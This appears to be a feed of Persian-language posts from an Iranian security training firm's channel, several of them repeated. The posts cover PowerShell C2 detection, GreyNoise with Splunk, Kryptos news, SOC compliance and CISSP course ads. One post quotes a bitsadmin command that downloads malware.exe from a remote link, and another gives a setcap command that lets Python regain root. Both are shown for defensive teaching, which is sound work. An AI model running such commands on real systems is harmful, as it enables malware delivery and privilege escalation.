در سناریوهای پس از نفوذ (Post-Exploitation)، مهاجمان حرفهای برای حفظ کنترل پایدار و پنهان بر روی سیستمهای قربانی، از چارچوبهای فرمان و کنترل (C2) پیشرفتهای مانند PowerShell Empire و Covenant استفاده میکنند. ویژگی اصلی این ابزارها، اجرای کدها مستقیماً در حافظه (Memory-Resident Execution) است. این تکنیک به مهاجم اجازه میدهد تا اسکریپتهای مخرب PowerShell را بدون ایجاد هیچ فایلی روی دیسک اجرا کند و در نتیجه، از دید بسیاری از آنتیویروسهای سنتی که بر اسکن فایلها متمرکز هستند، پنهان بماند.
مهاجم معمولاً با استفاده از دستوراتی مانند Invoke-Expression (IEX) یا پارامتر -EncodedCommand، اسکریپتهای خود را رمزگذاری (Encode) کرده و از طریق کانالهای ارتباطی رایج مانند HTTP، HTTPS یا SMB به سرور C2 متصل میشود. این امر باعث میشود ترافیک شبکه ظاهری کاملاً عادی داشته باشد، در حالی که در واقعیت، سیستم تحت کنترل کامل مهاجم قرار دارد.
بخش اول: تغییر رویکرد دفاعی؛ از فایل به رفتار
برای کشف این نوع فعالیتهای مخفیانه، تیمهای امنیتی باید تمرکز خود را از تحلیل «فایلهای مخرب» به سمت نظارت بر «رفتار فرآیندها و تغییرات حافظه» معطوف کنند. سرنخهای اصلی شناسایی این حملات، در خودِ فرآیندهای PowerShell و نحوه اجرای آنها نهفته است.
بخش دوم: ابزارها و تکنیکهای کلیدی برای شناسایی
۱. فعالسازی لاگهای پیشرفته PowerShell:
اولین و مهمترین گام، فعالسازی قابلیتهای ثبت لاگ داخلی PowerShell است. این قابلیتها دید عمیقی از کدهای اجراشده فراهم میکنند:
Script Block Logging (Event ID 4104): این لاگ، محتوای کامل اسکریپتهای اجراشده را ثبت میکند، حتی اگر رمزگذاری شده یا در حافظه اجرا شوند. تحلیلگران با بررسی این رویداد میتوانند کدهای مخفیشده در دستورات IEX یا -EncodedCommand را مشاهده کنند.
Module Logging (Event ID 4103): این قابلیت، جزئیات بارگذاری ماژولهای PowerShell و فراخوانی توابع مختلف را ثبت میکند که میتواند برای شناسایی رفتارهای غیرعادی مفید باشد.
۲. نظارت عمیق بر فرآیندها با Sysmon:
ابزار Sysmon (بخشی از مجموعه Sysinternals) یک ابزار قدرتمند برای نظارت بر فعالیتهای سطح سیستمعامل است. با نصب و پیکربندی صحیح Sysmon، میتوان رویدادهای حیاتی زیر را که مستقیماً به حملات PowerShell مرتبط هستند، ثبت و تحلیل کرد:
Event ID 1: Process Creation: ایجاد هر فرآیند PowerShell را به همراه پارامترهای خط فرمان آن ثبت میکند. وجود پارامترهای مشکوکی مانند -e, -enc, IEX, -nop, -w hidden یا DownloadString در این لاگ، یک نشانه خطر جدی است.
Event ID 17 & 18: Pipe Created/Connected: ابزارهایی مانند Empire برای ارتباط بین اجزای خود در داخل یک سیستم (Lateral Movement) از Named Pipe استفاده میکنند. شناسایی Pipeهایی با نامهای غیرمتعارف (مانند \\.\pipe\MSSE-*.server) میتواند نشاندهنده فعالیت C2 داخلی باشد.
Event ID 10: Process Access: این رویداد، دسترسی یک فرآیند به حافظه فرآیند دیگر را ثبت میکند. دسترسی غیرعادی یک فرآیند PowerShell یا rundll32.exe به حافظه فرآیند lsass.exe (که وظیفه مدیریت اعتبارسنجیها را بر عهده دارد)، یک نشانه قوی از تلاش برای سرقت اطلاعات هویتی با ابزارهایی مانند Mimikatz است.
بخش سوم: تحلیل دادهها و شکار تهدید (Threat Hunting)
پس از جمعآوری لاگها از منابع فوق، باید آنها را در یک پلتفرم مدیریت اطلاعات و رخدادهای امنیتی (SIEM) متمرکز کرده و تحلیل نمود. تحلیلگران میتوانند با استفاده از کوئریهای هدفمند، به شکار این تهدیدات بپردازند:
جستجوی رشتههای Base64 طولانی: دستورات -EncodedCommand از رمزگذاری Base64 استفاده میکنند. جستجوی فرآیندهای PowerShell که دارای رشتههای Base64 بسیار طولانی در خط فرمان خود هستند، یک تکنیک شکار مؤثر است.
ارتباطات شبکهای مشکوک: بررسی فرآیندهای PowerShell که ارتباطات شبکهای به خارج از سازمان برقرار میکنند، بهویژه اگر از مسیرهای غیرمعمول مانند پوشه Temp اجرا شده باشند.
تحلیل User-Agent در لاگهای پراکسی: چارچوبهای C2 معمولاً از User-Agentهای خاص یا غیرمرسومی در ارتباطات HTTP/HTTPS خود استفاده میکنند. شناسایی این الگوها در لاگهای وبپراکسی میتواند به کشف سرورهای C2 کمک کند.
ثبت نام دوره های امنیت سطح ۱ و ۲
واتس اپ 09902857290
Www.haumoun.com
❤7💯3
#تجربه جدید
استفاده از فید های GrayNoise با اسپلانک
بعنوان یک فعالیت جدید تمرکزم رو روی شناخت GrayNoise بعنوان منبع هوش تهدید گذاشته ام . براتون از تجربه ام مینویسم
منبع GreyNoise Intelligence یک پلتفرم تحلیل «نویز اینترنتی» (Internet Background Noise) است که با استقرار هزاران حسگر غیرفعال در سراسر جهان، دادههای مربوط به رفتار اسکن و شناسایی سرویسها را جمعآوری و طبقهبندی میکند. ویژگی منحصربهفرد آن، تمرکز بر تحلیل رفتاری IPها بهجای صرفاً ارائهی Reputation یا امضای تهدید است. GreyNoise میتواند تشخیص دهد آیا یک IP در حال انجام فعالیت عادی (مانند اسکن خودکار موتورهای جستوجوی امنیتی) است یا درگیر رفتار مشکوک و هماهنگ برای شناسایی آسیبپذیریها.
و اما بررسی من :
در اسپلانک استفاده از GreyNoise ارزش بالایی در کاهش هشدارهای کاذب و اولویتبندی رویدادها دارد. یکی از راهکارهای عملی، ایجاد یک Lookup Job روزانه برای Noise IP Filtering هست ؛ به این معنا که Splunk بهصورت خودکار لیست IPهای شناساییشده بهعنوان “benign scanner” در GreyNoise را فراخوانی کرده و در فرایند تحلیل آلارمها، آنها را از فهرست هشدارهای واقعی حذف میکند. این اقدام باعث کاهش میانگین زمان تجزیهوتحلیل (MTTA) و تمرکز تحلیلگران بر تهدیدهای واقعی میشود.
همچنین در چارچوب Splunk SOAR ، افزودن مرحلهی “Check with GreyNoise” در Playbookهای خودکار بسیار مؤثر است. با این گام، قبل از ارجاع حادثه به لایه ۲، سامانه بهصورت خودکار اعتبار IP مظنون را از GreyNoise استعلام میگیرد؛ چنانچه IP در دستهی نویز شناختهشده باشد، Incident بهصورت خودکار کاهش یا بسته میشود و اگر رفتار آن جدید یا ناشناخته باشد، هشدار به سطح بالاتر منتقل میگردد. این مدل باعث ارتقای بازده کل SOC، کاهش حجم کار لایه ۲ و افزایش دقت تصمیمهای پاسخگویی میشود
#نشر_دانش
#انتقال_تجربه
مرکز راهبری SOC شرکت هامون
با مجوز افتا
Www.haumoun.com
ثبت نام دوره های سطح ۱ و ۲
واتس اپ 09902857290
با امکان اشتغال
استفاده از فید های GrayNoise با اسپلانک
بعنوان یک فعالیت جدید تمرکزم رو روی شناخت GrayNoise بعنوان منبع هوش تهدید گذاشته ام . براتون از تجربه ام مینویسم
منبع GreyNoise Intelligence یک پلتفرم تحلیل «نویز اینترنتی» (Internet Background Noise) است که با استقرار هزاران حسگر غیرفعال در سراسر جهان، دادههای مربوط به رفتار اسکن و شناسایی سرویسها را جمعآوری و طبقهبندی میکند. ویژگی منحصربهفرد آن، تمرکز بر تحلیل رفتاری IPها بهجای صرفاً ارائهی Reputation یا امضای تهدید است. GreyNoise میتواند تشخیص دهد آیا یک IP در حال انجام فعالیت عادی (مانند اسکن خودکار موتورهای جستوجوی امنیتی) است یا درگیر رفتار مشکوک و هماهنگ برای شناسایی آسیبپذیریها.
و اما بررسی من :
در اسپلانک استفاده از GreyNoise ارزش بالایی در کاهش هشدارهای کاذب و اولویتبندی رویدادها دارد. یکی از راهکارهای عملی، ایجاد یک Lookup Job روزانه برای Noise IP Filtering هست ؛ به این معنا که Splunk بهصورت خودکار لیست IPهای شناساییشده بهعنوان “benign scanner” در GreyNoise را فراخوانی کرده و در فرایند تحلیل آلارمها، آنها را از فهرست هشدارهای واقعی حذف میکند. این اقدام باعث کاهش میانگین زمان تجزیهوتحلیل (MTTA) و تمرکز تحلیلگران بر تهدیدهای واقعی میشود.
همچنین در چارچوب Splunk SOAR ، افزودن مرحلهی “Check with GreyNoise” در Playbookهای خودکار بسیار مؤثر است. با این گام، قبل از ارجاع حادثه به لایه ۲، سامانه بهصورت خودکار اعتبار IP مظنون را از GreyNoise استعلام میگیرد؛ چنانچه IP در دستهی نویز شناختهشده باشد، Incident بهصورت خودکار کاهش یا بسته میشود و اگر رفتار آن جدید یا ناشناخته باشد، هشدار به سطح بالاتر منتقل میگردد. این مدل باعث ارتقای بازده کل SOC، کاهش حجم کار لایه ۲ و افزایش دقت تصمیمهای پاسخگویی میشود
#نشر_دانش
#انتقال_تجربه
مرکز راهبری SOC شرکت هامون
با مجوز افتا
Www.haumoun.com
ثبت نام دوره های سطح ۱ و ۲
واتس اپ 09902857290
با امکان اشتغال
🔥5🤓1
یکی مانده به آخر !
جلسه امروز مقدمه ای بر پایان دوره دوم CISSP سال ۱۴۰۴ آکادمی روزبه و شرکت هامون بود. اما شروعی بر فردای بهتر با تحویل ۱۸ متخصص عالی امنیت به جامعه ایران و حتی سایر کشورها.
تلاش میکنم دوره ای که برگزار میکنم ممتاز باشد چون اول برای خودم ارزش قائلم و بعد به حق شرکت کنندگان احترام میگذارم
با شما خواهم بود در سومین دوره CISSP سال ۱۴۰۴ همراه با پکیج آمادگی آزمون رسمی به زبان زیبای فارسی : ثبت نام توسط واتس اپ 09902857290
Www.haumoun.com
جلسه امروز مقدمه ای بر پایان دوره دوم CISSP سال ۱۴۰۴ آکادمی روزبه و شرکت هامون بود. اما شروعی بر فردای بهتر با تحویل ۱۸ متخصص عالی امنیت به جامعه ایران و حتی سایر کشورها.
تلاش میکنم دوره ای که برگزار میکنم ممتاز باشد چون اول برای خودم ارزش قائلم و بعد به حق شرکت کنندگان احترام میگذارم
با شما خواهم بود در سومین دوره CISSP سال ۱۴۰۴ همراه با پکیج آمادگی آزمون رسمی به زبان زیبای فارسی : ثبت نام توسط واتس اپ 09902857290
Www.haumoun.com
❤7
باز شدن رمز پس از ۳۵ سال
در سال ۱۹۹۰، مجسمه “Kryptos” توسط هنرمند آمریکایی جیم سانبورن (Jim Sanborn) در محوطهٔ مرکزی سازمان سیا (CIA) نصب شد. این اثر ترکیبی از هنر و علم رمزنگاری است و از چهار بخش رمزگذاریشده تشکیل میشود که روی یک صفحهٔ مسی بزرگ حک شدهاند. هدف سانبورن آن بود که نشان دهد زیبایی در تلاقی بین رمزها، دانش، و راز نهفته است.
سه بخش اول طی سالهای دههٔ ۱۹۹۰ تا اوایل ۲۰۱۰ توسط رمزنگاران حرفهای و علاقهمندان در سراسر جهان رمزگشایی شد. این پیامها شامل تاریخچهٔ کشف مقابر مصر و ارجاعاتی به رمزنگاری کلاسیک بودند. در مقابل، بخش چهارم (K4) هرگز حل نشد و به یکی از بزرگترین معماهای رمزنگاری معاصر جهان تبدیل شد — حتی متخصصان سیا و آژانس امنیت ملی (NSA) نیز نتوانستند متن کامل آن را بازیابی کنند.
در طول سالها سانبورن چند “سرنخ” عمومی منتشر کرد، از جمله دو واژهٔ از متن رمزگشاییشده – “BERLIN” و “CLOCK” – که نشان میداد محل یا مضمون پیام احتمالاً با برلین و زمان ارتباط دارد. با وجود این، معما همچنان سربسته باقی ماند و جامعهٔ رمزنگاری آن را نمادی از مرز میان دانش انسانی و ناشناخته تلقی کرد.
در اکتبر ۲۰۲۵، سانبورن در مصاحبهای با نیویورک تایمز اعلام کرد که اکنون قصد دارد راهحل نهایی بخش چهارم Kryptos را افشا کند. او گفته است با توجه به سن بالا و گذر زمان، نمیخواهد این راز بدون توضیح از بین برود، بنابراین راهحل و مستندات اصلی طراحی آن را از طریق حراجی کریستی (Christie’s) به فروش میگذارد. این مجموعه شامل متن رمز اصلی، ترجمهٔ آشکار (Plaintext)، یادداشتهای طراحی و نسخههای اولیهٔ الگوریتم رمز است. درآمد حاصل احتمالاً به پروژههای هنری و آموزشی اهدا میشود.
افشای رمز Kryptos پس از ۳۵ سال پایانی نمادین بر یکی از طولانیترین چالشهای رمزنگاری دوران مدرن خواهد بود؛ اثری که مرز میان هنر، اطلاعات و اسرار دولتی را برای همیشه در تاریخ ثبت کرد
https://www.nytimes.com/2025/10/16/science/kryptos-cia-solution-sanborn-auction.html?unlocked_article_code=1.t08.Fb2g.wov0l-NgQKoE&smid=url-share
در سال ۱۹۹۰، مجسمه “Kryptos” توسط هنرمند آمریکایی جیم سانبورن (Jim Sanborn) در محوطهٔ مرکزی سازمان سیا (CIA) نصب شد. این اثر ترکیبی از هنر و علم رمزنگاری است و از چهار بخش رمزگذاریشده تشکیل میشود که روی یک صفحهٔ مسی بزرگ حک شدهاند. هدف سانبورن آن بود که نشان دهد زیبایی در تلاقی بین رمزها، دانش، و راز نهفته است.
سه بخش اول طی سالهای دههٔ ۱۹۹۰ تا اوایل ۲۰۱۰ توسط رمزنگاران حرفهای و علاقهمندان در سراسر جهان رمزگشایی شد. این پیامها شامل تاریخچهٔ کشف مقابر مصر و ارجاعاتی به رمزنگاری کلاسیک بودند. در مقابل، بخش چهارم (K4) هرگز حل نشد و به یکی از بزرگترین معماهای رمزنگاری معاصر جهان تبدیل شد — حتی متخصصان سیا و آژانس امنیت ملی (NSA) نیز نتوانستند متن کامل آن را بازیابی کنند.
در طول سالها سانبورن چند “سرنخ” عمومی منتشر کرد، از جمله دو واژهٔ از متن رمزگشاییشده – “BERLIN” و “CLOCK” – که نشان میداد محل یا مضمون پیام احتمالاً با برلین و زمان ارتباط دارد. با وجود این، معما همچنان سربسته باقی ماند و جامعهٔ رمزنگاری آن را نمادی از مرز میان دانش انسانی و ناشناخته تلقی کرد.
در اکتبر ۲۰۲۵، سانبورن در مصاحبهای با نیویورک تایمز اعلام کرد که اکنون قصد دارد راهحل نهایی بخش چهارم Kryptos را افشا کند. او گفته است با توجه به سن بالا و گذر زمان، نمیخواهد این راز بدون توضیح از بین برود، بنابراین راهحل و مستندات اصلی طراحی آن را از طریق حراجی کریستی (Christie’s) به فروش میگذارد. این مجموعه شامل متن رمز اصلی، ترجمهٔ آشکار (Plaintext)، یادداشتهای طراحی و نسخههای اولیهٔ الگوریتم رمز است. درآمد حاصل احتمالاً به پروژههای هنری و آموزشی اهدا میشود.
افشای رمز Kryptos پس از ۳۵ سال پایانی نمادین بر یکی از طولانیترین چالشهای رمزنگاری دوران مدرن خواهد بود؛ اثری که مرز میان هنر، اطلاعات و اسرار دولتی را برای همیشه در تاریخ ثبت کرد
https://www.nytimes.com/2025/10/16/science/kryptos-cia-solution-sanborn-auction.html?unlocked_article_code=1.t08.Fb2g.wov0l-NgQKoE&smid=url-share
Nytimes
A C.I.A. Secret Kept for 35 Years Is Found in the Smithsonian’s Vault (Gift Article)
Jim Sanborn is auctioning off the solution to Kryptos, the puzzle he sculpted for the intelligence agency’s headquarters. Two fans of the work then discovered the key.
❤5⚡2
دوره CISSP یکتا و ممتاز
برای تمام ایرانیان -آنلاین
با پکیج ویژه و یکسال منتورینگ استاد روزبه
واتس اپ 09902857290
کاملترین دوره CISSP در ایران به تایید دانشجویان
✳️✳️✳️✳️✳️✳️✳️
#آکادمی_روزبه
مرکز تخصصی CISSP
www.haumoun.com
سمینار و کارگاه عملی CISSP
مختص دانشجویان آکادمی روزبه و شرکت هامون www.haumoun.com
۸ آبانماه ۱۴۰۴ تهران
**این سمینار جزو پکیج آموزشی آمادگی آزمون CISSP است که در راستای جبران کمبود روش تدریس آنلاین و انجام کارگاه و منتورینگ و نتورکینگ اعضای کلاس های امسال؛ تشکیل میگردد
برای تمام ایرانیان -آنلاین
با پکیج ویژه و یکسال منتورینگ استاد روزبه
واتس اپ 09902857290
کاملترین دوره CISSP در ایران به تایید دانشجویان
✳️✳️✳️✳️✳️✳️✳️
#آکادمی_روزبه
مرکز تخصصی CISSP
www.haumoun.com
سمینار و کارگاه عملی CISSP
مختص دانشجویان آکادمی روزبه و شرکت هامون www.haumoun.com
۸ آبانماه ۱۴۰۴ تهران
**این سمینار جزو پکیج آموزشی آمادگی آزمون CISSP است که در راستای جبران کمبود روش تدریس آنلاین و انجام کارگاه و منتورینگ و نتورکینگ اعضای کلاس های امسال؛ تشکیل میگردد
👏4❤1
وقتی EDR خوب داشته باشی قبل از عمل؛ دستور مهاجم Kill میشه تا SOC ات سرش خلوت باشه و بتونه به کشف Zero day امیدوار باشه
این کامندیه که کیل شده
bitsadmin /transfer MyDownloadJob /download /priority NORMAL "https://lnkd.in/dAg93i59" "C:\Users\Public\Downloads\malware.exe
این کامندیه که کیل شده
bitsadmin /transfer MyDownloadJob /download /priority NORMAL "https://lnkd.in/dAg93i59" "C:\Users\Public\Downloads\malware.exe
lnkd.in
LinkedIn
This link will take you to a page that’s not on LinkedIn
💯7
تجربه
یکی از روشهای مورد استفاده مهاجمان برای این که بتوانند دسترسی root را دوباره بهدست بیاورند، استفاده از «Linux Capabilities» برای باینری Python است.
مثال :
bash
setcap cap_setuid+ep /usr/bin/python3.12
توضیح:
در لینوکس، دستور setcap به یک فایل اجرایی قابلیتهایی (Capabilities) میدهد که معمولاً فقط فایلهای با سطح دسترسی SUID دارند.
در این مثال، با فعالکردن قابلیت cap_setuid+ep برای /usr/bin/python3.12، مهاجم باعث میشود که باینری Python بتواند سطح دسترسی کاربر جاری را به root تغییر دهد (مثل setuid root بدون نیاز به SUID bit).
⚠️ پیامد امنیتی:
بدون اینکه بیت SUID را روی فایل Python تنظیم کنند یا باینری را تغییر دهند، مهاجم میتواند با استفاده از همین قابلیتها:
از طریق Python یک شِل (Shell) با دسترسی root اجرا کند.
دربپشتیهای سطح پایین و پنهان بسازد.
این تغییر سطح دسترسی ممکن است از دید ابزارهای امنیتی یا سیستمهای مانیتورینگ ساده پنهان بماند، چون فایل Python هنوز ظاهر عادی دارد.
#نشر_دانش
#آکادمی_روزبه
مرکز تخصصی CISSP
یکی از روشهای مورد استفاده مهاجمان برای این که بتوانند دسترسی root را دوباره بهدست بیاورند، استفاده از «Linux Capabilities» برای باینری Python است.
مثال :
bash
setcap cap_setuid+ep /usr/bin/python3.12
توضیح:
در لینوکس، دستور setcap به یک فایل اجرایی قابلیتهایی (Capabilities) میدهد که معمولاً فقط فایلهای با سطح دسترسی SUID دارند.
در این مثال، با فعالکردن قابلیت cap_setuid+ep برای /usr/bin/python3.12، مهاجم باعث میشود که باینری Python بتواند سطح دسترسی کاربر جاری را به root تغییر دهد (مثل setuid root بدون نیاز به SUID bit).
⚠️ پیامد امنیتی:
بدون اینکه بیت SUID را روی فایل Python تنظیم کنند یا باینری را تغییر دهند، مهاجم میتواند با استفاده از همین قابلیتها:
از طریق Python یک شِل (Shell) با دسترسی root اجرا کند.
دربپشتیهای سطح پایین و پنهان بسازد.
این تغییر سطح دسترسی ممکن است از دید ابزارهای امنیتی یا سیستمهای مانیتورینگ ساده پنهان بماند، چون فایل Python هنوز ظاهر عادی دارد.
#نشر_دانش
#آکادمی_روزبه
مرکز تخصصی CISSP
🙏4❤1
قابل توجه مسوولان
روند افزایشی را در برون سپاری خدمات IT و امنیت را شاهد هستم.
در کنار منافع ( که برخی مواقع جبر بوده ) بایستی ریسک ها را هم در نظر گرفت.
🔴لازم است مسوولان کشوری نسبت به تهیه و ابلاغ تطابق سنجی با گزارشاتی چون SOC1, 2,3 اقدام کنند تا برون سپاری ها تحت کنترل باشد وگرنه در آینده نزدیک شاهد شکست های حفاظتی شدید از سوی پیمانکاران خواهیم بود
هلدینگ ها و شرکت های مادر هم میتوانند با ابلاغ گزارشات تطابق سنجی SOC به زیر مجموعه های خود نقشی مهم در کنترل امنیت ایفا کنند
۲۷ مهرماه ۱۴۰۴ ثبت شد.
روزبه نوروزی
**گزارشات SOC از بحث مرکز عملیات امنیت جداست و مقوله ای نظارتی است.
روند افزایشی را در برون سپاری خدمات IT و امنیت را شاهد هستم.
در کنار منافع ( که برخی مواقع جبر بوده ) بایستی ریسک ها را هم در نظر گرفت.
🔴لازم است مسوولان کشوری نسبت به تهیه و ابلاغ تطابق سنجی با گزارشاتی چون SOC1, 2,3 اقدام کنند تا برون سپاری ها تحت کنترل باشد وگرنه در آینده نزدیک شاهد شکست های حفاظتی شدید از سوی پیمانکاران خواهیم بود
هلدینگ ها و شرکت های مادر هم میتوانند با ابلاغ گزارشات تطابق سنجی SOC به زیر مجموعه های خود نقشی مهم در کنترل امنیت ایفا کنند
۲۷ مهرماه ۱۴۰۴ ثبت شد.
روزبه نوروزی
**گزارشات SOC از بحث مرکز عملیات امنیت جداست و مقوله ای نظارتی است.
👌8❤3👍3
وصله شده این dMSA، درست؛ ولی BadSuccessor از attribute دیگری در همان ساختار trust chain سوءاستفاده میکند.
توجه داشته باشید
دوره های سطح ۱ و ۲
پوشش دهنده گپ های دانشی شما
https://specterops.io/blog/2025/10/20/the-near-return-of-the-king-account-takeover-using-the-badsuccessor-technique/
توجه داشته باشید
دوره های سطح ۱ و ۲
پوشش دهنده گپ های دانشی شما
https://specterops.io/blog/2025/10/20/the-near-return-of-the-king-account-takeover-using-the-badsuccessor-technique/
SpecterOps
The (Near) Return of the King: Account Takeover Using the BadSuccessor Technique - SpecterOps
After Microsoft patched Yuval Gordon’s BadSuccessor privilege escalation technique, BadSuccessor returned with another blog from Yuval, briefly mentioning to the community that attackers can still abuse dMSAs to take over any object where we have a write…
⚡3💯1